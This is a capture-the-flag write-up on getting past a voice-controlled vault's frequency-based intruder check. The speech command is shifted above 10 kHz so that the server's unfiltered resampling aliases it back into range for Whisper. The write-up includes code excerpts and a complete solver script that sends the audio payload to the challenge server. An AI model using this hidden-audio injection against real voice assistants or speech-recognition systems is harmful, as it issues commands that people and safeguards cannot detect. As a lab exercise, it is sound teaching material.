Mission Impossible TSG CTF Writeup: Bypassing Audio Security with Spectral Aliasing

Challenge Details
Category: Misc / Signal Processing / Audio
Description:
The security system of CIA vault room is state-of-the-art.
There are a large number of pressure-sensitive, temperature-sensitive and audio-sensitive sensors.
And the terminal is operated by voice recognition.
Files Provided:
❯ tree .
.
├── Dockerfile
└── src
    └── server.py
Goal: Bypass a frequency-based security system to issue a voice command to a neural network.
Solution
1. Challenge Overview
We are presented with a "state-of-the-art" voice-controlled vault. The system listens for audio commands but has strict security measures:
Intruder Detector: It analyzes the audio spectrum. If it detects any sound energy in the 0 Hz – 10,000 Hz band, which is where speech normally lives, it triggers an alarm.
Voice Recognition: If the alarm isn't triggered, the audio is passed to OpenAI's Whisper model to check for the passphrase: "Give me the flag".
The Paradox: We need to send a voice command (a human voice has a fundamental of roughly 85 Hz to 255 Hz, with the harmonics that carry intelligibility reaching a few kHz) without creating any sound energy below 10,000 Hz.
2. Analyzing the Source Code (server.py)
There are two critical functions in the server code that reveal the vulnerability.
The Guard: detect_intruder
def detect_intruder(freq_space, sr):
    # Zeroes out everything ABOVE 10,000 Hz
    cut_high_freqs(freq_space, sr, 10000)
    # Checks if anything remains BELOW 10,000 Hz
    magnitude = np.abs(freq_space).max()
    return magnitude > 0
This function acts as a Low-Pass Filter. It deletes high frequencies and checks the remaining low frequencies. If our audio has silence in the 0–10kHz range, we pass this check.
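To rehearse the guard locally, a minimal sketch can stand in for it. The server's `cut_high_freqs` is not shown in the writeup, so `cut_high_freqs_sketch` below is a hypothetical re-implementation that assumes the spectrum comes from `np.fft.rfft`. The small tolerance `tol` is also an assumption, added only to absorb floating-point noise; the server itself compares against exactly 0.

```python
import numpy as np

def cut_high_freqs_sketch(freq_space, sr, cutoff_hz):
    """Hypothetical stand-in for the server's cut_high_freqs.

    Zeroes, in place, every rFFT bin above cutoff_hz.
    Assumes freq_space came from np.fft.rfft of an even-length signal.
    """
    n_samples = 2 * (len(freq_space) - 1)
    freqs = np.fft.rfftfreq(n_samples, d=1.0 / sr)
    freq_space[freqs > cutoff_hz] = 0

def detect_intruder_sketch(wave, sr, cutoff_hz=10000, tol=1e-6):
    """Return True if any meaningful energy remains at or below cutoff_hz."""
    freq_space = np.fft.rfft(wave)
    cut_high_freqs_sketch(freq_space, sr, cutoff_hz)
    # tol is an assumption of this sketch, scaled by the signal length
    return bool(np.abs(freq_space).max() > tol * len(wave))

sr = 48000
t = np.arange(sr) / sr  # one second of audio
print("1 kHz tone trips the alarm: ", detect_intruder_sketch(np.cos(2 * np.pi * 1000 * t), sr))
print("15 kHz tone trips the alarm:", detect_intruder_sketch(np.cos(2 * np.pi * 15000 * t), sr))
```

Under these assumptions a tone inside the guarded band is flagged, while a tone above 10 kHz is invisible to the check.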
The Listener: recognize
# ... Intruder check passed ...
# Resample to 16,000 Hz for Whisper
wave = librosa.resample(wave, orig_sr=sr, target_sr=WHISPER_SR, res_type="linear")
result = whisper.transcribe(model, wave)["text"]
This is the flaw. The server uses librosa.resample with res_type="linear". Linear interpolation is fast, but it lacks a proper anti-aliasing filter.
If you feed a signal with frequencies higher than the Nyquist frequency of the output (half the target sample rate) into a resampler without filtering, those high frequencies "fold back" (alias) and appear as low frequencies.
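The difference an anti-aliasing filter makes can be seen in a small experiment. The sketch below does not call librosa. Instead, `resample_linear` is a hypothetical helper that emulates linear-interpolation resampling with `np.interp`, and `scipy.signal.resample_poly` serves as an example of a resampler that does low-pass filter before decimating. The 15 kHz test tone and the 48 kHz source rate are illustrative choices.

```python
import numpy as np
from scipy.signal import resample_poly

SRC_SR = 48000  # illustrative source rate
DST_SR = 16000  # Whisper's input rate

def resample_linear(wave, src_sr, dst_sr):
    """Emulate linear-interpolation resampling: no low-pass filter is applied."""
    t_src = np.arange(len(wave)) / src_sr
    n_dst = int(len(wave) / src_sr * dst_sr)
    t_dst = np.arange(n_dst) / dst_sr
    return np.interp(t_dst, t_src, wave)

def rms(x):
    return float(np.sqrt(np.mean(np.square(x))))

t = np.arange(SRC_SR) / SRC_SR
tone_15k = np.cos(2 * np.pi * 15000 * t)  # above the 8 kHz output Nyquist

naive = resample_linear(tone_15k, SRC_SR, DST_SR)
filtered = resample_poly(tone_15k, up=1, down=3)

# Skip the edges, where the polyphase filter has start-up transients
rms_naive = rms(naive[200:-200])
rms_filtered = rms(filtered[200:-200])
print(f"linear interpolation keeps RMS {rms_naive:.3f}")
print(f"filtered resampling keeps RMS  {rms_filtered:.5f}")
```

The unfiltered path keeps the tone at essentially full strength (now aliased to a lower frequency), whereas the filtered path suppresses it. That gap is what the exploit relies on.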
3. The Vulnerability: Spectral Aliasing
Aliasing is a phenomenon where different signals become indistinguishable when sampled.
The target sample rate is 16,000 Hz.
This means the "Nyquist Limit" is 8,000 Hz.
Any frequency f entered into this system will appear as f if f < 8000. However, if we input a frequency f near 16,000 Hz, the sampler essentially "misses" the cycles and interprets it as a low frequency.
The Math: If we sample a signal at F_s = 16000 Hz, a high-frequency input at F_in = 16000 - x Hz will look exactly like a low-frequency signal at x Hz.
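The folding rule can be written as a tiny helper and checked against actual samples. `alias_frequency` is a name introduced here for illustration; it assumes a real-valued tone and ideal sampling with no filtering.

```python
import numpy as np

def alias_frequency(f_in, fs):
    """Apparent frequency (Hz) of a real tone f_in when sampled at fs with no filtering."""
    f = f_in % fs
    return min(f, fs - f)

FS = 16000
print(alias_frequency(15000, FS))  # 1000
print(alias_frequency(17000, FS))  # 1000
print(alias_frequency(5000, FS))   # 5000 (below Nyquist, unchanged)

# The samples themselves are indistinguishable: 15 kHz and 1 kHz tones
# produce the same sequence when observed at 16 kHz.
n = np.arange(64)
high = np.cos(2 * np.pi * 15000 * n / FS)
low = np.cos(2 * np.pi * 1000 * n / FS)
print(np.allclose(high, low))  # True
```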
The Plan:
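Take the voice command ("Give me the flag") and band-limit it to roughly 0–3 kHz; a 1 kHz component serves as the running example.
Shift it up around a 16 kHz carrier using Amplitude Modulation, so the 1 kHz component lands at 15 kHz (with a mirror image at 17 kHz).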
The Guard (Intruder Detector): Sees 15 kHz. It ignores everything above 10 kHz. It sees silence. PASS.
The Listener (Whisper): Resamples the 15 kHz signal at 16 kHz. Due to aliasing, the 15 kHz signal folds back down to 1 kHz. Whisper hears the voice clearly.
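The plan can be rehearsed on a single tone before involving real speech. In the sketch below a 1 kHz cosine stands in for the voice, and the 48 kHz to 16 kHz linear resampling is approximated by keeping every third sample. That approximation is reasonable because the output instants coincide with input samples at this 3:1 ratio. The variable names are illustrative, not taken from the server.

```python
import numpy as np

SR = 48000          # payload sample rate
CARRIER_HZ = 16000  # chosen to equal Whisper's 16 kHz input rate
VOICE_HZ = 1000     # stand-in for the voice

t = np.arange(SR) / SR  # one second, so FFT bins are 1 Hz apart
voice = np.cos(2 * np.pi * VOICE_HZ * t)
payload = voice * np.cos(2 * np.pi * CARRIER_HZ * t)

# What the guard sees: two sidebands at 16 kHz -/+ 1 kHz, nothing below 10 kHz
spectrum = np.abs(np.fft.rfft(payload))
freqs = np.fft.rfftfreq(len(payload), d=1.0 / SR)
sidebands = sorted(int(round(float(f))) for f in freqs[np.argsort(spectrum)[-2:]])
low_band_peak = float(spectrum[freqs < 10000].max())
print("sidebands (Hz):", sidebands)
print("largest bin below 10 kHz:", low_band_peak)

# What Whisper hears: at every third sample the carrier equals 1,
# so the decimated payload is the original voice sampled at 16 kHz
heard = payload[::3]
expected = voice[::3]
print("voice recovered:", np.allclose(heard, expected))
```

Choosing the carrier equal to the target sample rate is what makes the recovery so clean: the carrier is sampled at the same phase every time, so it drops out of the product.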
4. The Final Script
import numpy as np
import librosa
import scipy.signal
from scipy.io import wavfile
from gtts import gTTS
from gradio_client import Client, handle_file
import os

# Helper to remove high frequencies (clean input)
def butter_lowpass_filter(data, cutoff, fs, order=5):
    nyq = 0.5 * fs
    b, a = scipy.signal.butter(order, cutoff / nyq, btype='low', analog=False)
    return scipy.signal.filtfilt(b, a, data)

# Helper to remove low frequencies (clean output)
def butter_highpass_filter(data, cutoff, fs, order=5):
    nyq = 0.5 * fs
    b, a = scipy.signal.butter(order, cutoff / nyq, btype='high', analog=False)
    return scipy.signal.filtfilt(b, a, data)

def solve():
    # 1. Generate Voice Command
    print("[*] Generating TTS...")
    tts = gTTS("give me the flag")
    tts.save("base.mp3")

    # 2. Preparation
    # We use 48kHz to give us enough "room" to shift frequencies up
    target_sr = 48000
    y, sr = librosa.load("base.mp3", sr=target_sr)
    y = y[:int(4.5 * target_sr)]  # Trim duration

    # 3. Clean the Source
    # Filter out anything above 3kHz in the voice so it doesn't leak later
    y_clean = butter_lowpass_filter(y, 3000, target_sr, order=6)

    # 4. Modulation (The Magic Trick)
    # Shift the 0-3kHz voice up to 13-19kHz range
    t = np.arange(len(y_clean)) / target_sr
    carrier = np.cos(2 * np.pi * 16000 * t)
    y_mod = y_clean * carrier

    # 5. Safety Firewall
    # Delete anything below 11kHz to ensure we bypass the intruder detector
    y_final = butter_highpass_filter(y_mod, 11000, target_sr, order=6)

    # 6. Anti-Click Fading
    # Smooth the start and end to prevent "pop" noises that trigger alarms
    fade_len = int(0.1 * target_sr)
    fade_in = np.linspace(0, 1, fade_len)
    fade_out = np.linspace(1, 0, fade_len)
    y_final[:fade_len] *= fade_in
    y_final[-fade_len:] *= fade_out

    # 7. Save and Send
    y_int16 = (y_final / np.max(np.abs(y_final)) * 32767).astype(np.int16)
    wavfile.write("payload.wav", target_sr, y_int16)
    print("[*] Sending payload...")
    client = Client("http://35.194.98.181:57860/")
    result = client.predict(audio=handle_file("payload.wav"), api_name="/predict")
    print(result)


if __name__ == "__main__":
    solve()
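The two Butterworth stages in the script can be motivated with a synthetic experiment that needs neither TTS nor the network. Real speech contains some energy above 3 kHz; a 7 kHz component, for example, would be modulated down to 16 - 7 = 9 kHz, inside the guarded band. The sketch below uses a made-up test signal (a 1 kHz tone plus a weaker 7 kHz tone) and a hypothetical helper `low_band_fraction` to compare how much energy lands below 10 kHz with and without the filters. It is an offline illustration, not a measurement of the actual payload.

```python
import numpy as np
from scipy.signal import butter, filtfilt

SR = 48000

def zero_phase_butter(data, cutoff_hz, btype, order=6):
    """Zero-phase Butterworth filter, mirroring the script's filtfilt helpers."""
    b, a = butter(order, cutoff_hz / (0.5 * SR), btype=btype)
    return filtfilt(b, a, data)

def low_band_fraction(wave, limit_hz=10000):
    """Fraction of the signal's spectral energy that lies below limit_hz."""
    power = np.abs(np.fft.rfft(wave)) ** 2
    freqs = np.fft.rfftfreq(len(wave), d=1.0 / SR)
    return float(power[freqs < limit_hz].sum() / power.sum())

t = np.arange(SR) / SR
# Synthetic "voice": 1 kHz tone plus a 7 kHz component standing in for sibilance
voice = np.cos(2 * np.pi * 1000 * t) + 0.5 * np.cos(2 * np.pi * 7000 * t)
carrier = np.cos(2 * np.pi * 16000 * t)

# No filtering: the 7 kHz component is shifted to 9 kHz and would be detected
unfiltered = voice * carrier

# Script-style chain: low-pass at 3 kHz, modulate, high-pass at 11 kHz
filtered = zero_phase_butter(zero_phase_butter(voice, 3000, "low") * carrier, 11000, "high")

leak_unfiltered = low_band_fraction(unfiltered)
leak_filtered = low_band_fraction(filtered)
print(f"energy below 10 kHz without filters: {leak_unfiltered:.4f}")
print(f"energy below 10 kHz with filters:    {leak_filtered:.2e}")
```

With the filters in place the leaked fraction should fall far below the unfiltered figure, which is why the script cleans the voice before modulation and sweeps the low band again afterwards.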
Output:
❯ python3 solver2.py
[*] Generating base audio...
[*] Applying Low-pass filter (3kHz)...
[*] Modulating with 16kHz carrier...
[*] Applying High-pass filter (11kHz)...
[*] Payload saved to robust_solution.wav
[*] Sending payload to CIA Vault Terminal...
Loaded as API: http://35.194.98.181:57860/
[+] Server Response:
OK, here is the flag: TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
Final Flag
TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}




